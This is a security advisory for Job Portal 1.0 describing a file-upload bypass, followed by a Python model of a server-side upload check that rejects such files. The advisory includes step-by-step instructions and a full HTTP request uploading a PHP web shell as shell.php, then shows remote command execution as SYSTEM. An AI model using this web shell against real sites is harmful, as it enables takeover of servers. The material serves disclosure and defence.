
<!--
# Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://phpgurukul.com/job-portal-project/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7855
# Version: 1.0
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps


1. Description

File Upload Restriction Bypass vulnerabilities were found in Job Portal 1.0.
This allows an authenticated user to potentially obtain RCE via a webshell.


2. Proof of Concept

1. Go to the user profile >> (/jobportal/applicant/)
2. Select profile image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.png
5. Alter request in the upload...
   Update 'filename' to desired extension. ex: shell.php
   It is not necessary to change the content type to 'image/png'.

Example exploitation request:

====================================================================================================

POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 555
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------57052814523281
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------57052814523281
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/png

?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
IEND
-----------------------------57052814523281
Content-Disposition: form-data; name="savephoto"


-----------------------------57052814523281--

====================================================================================================

6. Send the request and visit your new webshell
Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami

nt authority\system


3. Solution:

Patch:
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

-->
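The server-side policy that the solution link above describes, written here as an added Python model of the check (it is not Job Portal's PHP code): it parses a multipart body constructed to mirror the request in the advisory, rejects the renamed `shell.php` on an extension allowlist regardless of the client's Content-Type, rejects an image/PHP polyglot by a heuristic scan, and stores accepted files under a server-chosen name. The boundary is the one from the advisory; the file contents, helper names and allowlist are constructed assumptions.

```python
import re
import secrets

# Constructed multipart body in the shape of the advisory's request; the PNG
# signature is real, the image data is a stand-in.
BOUNDARY = b"---------------------------57052814523281"
PNG_SIG = b"\x89PNG\r\n\x1a\n"
CLEAN_PNG = PNG_SIG + b"\x00\x00\x00\rIHDR...IEND"
POLYGLOT = PNG_SIG + b"...<?php /* web shell placeholder */ ?>IEND"

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}              # assumed allowlist
MAGIC = {PNG_SIG: ".png", b"\xff\xd8\xff": ".jpg", b"GIF8": ".gif"}

def build_request(filename: bytes, content: bytes) -> bytes:
    d = b"--" + BOUNDARY
    return (d + b'\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1000000\r\n'
            + d + b'\r\nContent-Disposition: form-data; name="photo"; filename="' + filename
            + b'"\r\nContent-Type: image/png\r\n\r\n' + content + b"\r\n"
            + d + b'\r\nContent-Disposition: form-data; name="savephoto"\r\n\r\n\r\n'
            + d + b"--\r\n")

def parse_multipart(body: bytes, boundary: bytes) -> list:
    """Minimal multipart/form-data parser: returns (headers, data) per part."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {k.strip().lower(): v.strip() for k, _, v
                   in (ln.partition(b":") for ln in head.split(b"\r\n"))}
        parts.append((headers, data[:-2] if data.endswith(b"\r\n") else data))
    return parts

def validate_photo(headers: dict, data: bytes) -> tuple:
    """Server-side policy: the client's Content-Type and extension are never trusted."""
    m = re.search(rb'filename="([^"]*)"', headers.get(b"content-disposition", b""))
    if not m:
        return False, "no filename"
    name = re.split(r"[\\/]", m.group(1).decode("utf-8", "replace"))[-1]
    ext = name[name.rfind("."):].lower() if "." in name else ""
    if ext not in ALLOWED_EXT:               # rejects shell.php, shell.phtml, shell.PHP ...
        return False, f"extension {ext!r} not allowed"
    sig_ext = next((e for sig, e in MAGIC.items() if data.startswith(sig)), None)
    if sig_ext is None:
        return False, "content is not a recognised image"
    if re.search(rb"<\?(php|=)", data):      # heuristic against image/PHP polyglots
        return False, "PHP tag embedded in image data"
    # Server-chosen name; the extension comes from the content, not from the client.
    return True, secrets.token_hex(16) + sig_ext

def check_photo_upload(body: bytes) -> tuple:
    for headers, data in parse_multipart(body, BOUNDARY):
        if b'name="photo"' in headers.get(b"content-disposition", b""):
            return validate_photo(headers, data)
    return False, "no photo part"
```

Storing the accepted file outside the web root, or in a directory where the PHP handler is disabled, is the second layer the OWASP page calls for; the name check alone is not enough on its own.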